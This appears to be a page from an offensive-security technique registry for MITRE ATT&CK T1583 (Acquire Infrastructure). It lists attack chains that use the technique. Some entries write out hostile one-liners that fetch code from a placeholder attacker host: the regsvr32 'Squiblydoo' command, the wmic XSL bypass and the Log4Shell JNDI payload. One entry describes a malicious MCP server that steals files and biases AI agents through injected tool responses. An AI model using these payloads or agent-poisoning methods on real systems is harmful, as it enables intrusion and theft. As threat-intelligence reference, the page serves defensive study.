Acquire Infrastructure
Buy / register domains, VPS, CDN accounts, mail servers — staging infrastructure for the operation.
§ Where this technique fits
T1583 is catalogued under the Resource Development tactic of the offensive-security kill-chain. It appears in 15 approved dossiers in the registry, typically at step 1.6 on average.
Authoritative reference: attack.mitre.org/techniques/T1583/.
§ Dossiers chaining this technique
- step 1 / 6
Malicious MCP server → silent supply chain for agent tools
User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- step 1 / 5
IMSI catcher → force 2G downgrade → SMS / call intercept
Operate a rogue base station in the target area. Phones associate; force fallback to 2G where no mutual auth is required. Intercept SMS OTPs, sniff voice calls, push notifications fail silently.
- step 1 / 5
BGP prefix hijack → traffic interception
From a compliant origin AS, announce a more-specific or origin-spoofed prefix belonging to the victim. Internet routing converges on the attacker AS; traffic for that prefix flows through attacker for inspection / DoS.
- step 1 / 6
Mass SMS phish → Okta-style portal → SaaS sprawl (0ktapus)
Wide SMS phishing campaign targeting employees of ~130 organisations with a single phishlet that captures Okta credentials + push approval. Mass automated logins to Twilio, MailChimp, DoorDash et al.
- step 1 / 6
Stolen credentials → no-MFA Snowflake → mass tenant exfil (2024)
Infostealer logs from third-party machines yielded credentials for many Snowflake tenants. Tenants without enforced MFA / IP allow-lists were directly queried; dozens of customer data sets exfiltrated.
- step 1 / 5
Squiblydoo: regsvr32 → remote SCT execution
regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
- step 1 / 4
wmic + XSL → AppLocker / SRP bypass
wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- step 1 / 5
Hardware wallet supply-chain tamper → pre-seeded seed
Intercept Trezor / Ledger / KeepKey in transit (or counterfeit on Amazon / eBay). Replace device with one that already has a known seed phrase the attacker controls — victim deposits, attacker drains.
- step 1 / 6
Wallet drainer dApp → setApprovalForAll → instant theft
Victim connects their wallet to a phishing dApp (fake mint / fake airdrop). One click on 'Confirm' calls setApprovalForAll on every valuable NFT collection — drained moments later.
- step 1 / 6
DNS rebinding → access internal router admin from a browser
Victim visits attacker page. JS opens a connection to attacker.com, which after the first request flips its DNS A record to 192.168.1.1 — subsequent requests now go to the victim's router under the attacker's origin.
- step 1 / 5
Autodiscover external leak → credential harvest
Mis-implemented Autodiscover falls back to autodiscover.<TLD>; register that domain externally, harvest plaintext Basic-auth credentials from clients that haven't been patched / configured properly.
- step 2 / 6
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
- step 3 / 7
Permissive SPF / DMARC p=none → CEO impersonation BEC
Target publishes SPF ~all and DMARC p=none. Send mail from attacker IP with a forged From: <ceo@target.com>; gateway delivers as-is. Combine with display-name spoof for a credible BEC.
- step 4 / 6
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- step 4 / 7
Reconfigure MFP LDAP → harvest service-account credentials
Walk up to / network-into the MFP admin web panel (default creds), change the LDAP address-book server to attacker IP — printer immediately re-binds and sends its service-account creds in cleartext.
§ What commonly comes next
- 01Phishingseen 3×T1566 · Initial Access
- 02GitHub / GitLab Dorkingseen 2×W-RECON-GITHUB-DORK · Reconnaissance
- 03Application Layer Protocolseen 1×T1071 · Command and Control
- 04BGP Route Hijackseen 1×NET-BGP-HIJACK · Lateral Movement
- 05Command and Scripting Interpreterseen 1×T1059 · Execution
- 06Evil Twin / Rogue APseen 1×WIFI-EVIL-TWIN · Initial Access
- 07Hardware Wallet Supply-Chain Tamperseen 1×WLT-HW-SUPPLY · Initial Access
- 08Modify Authentication Processseen 1×T1556 · Credential Access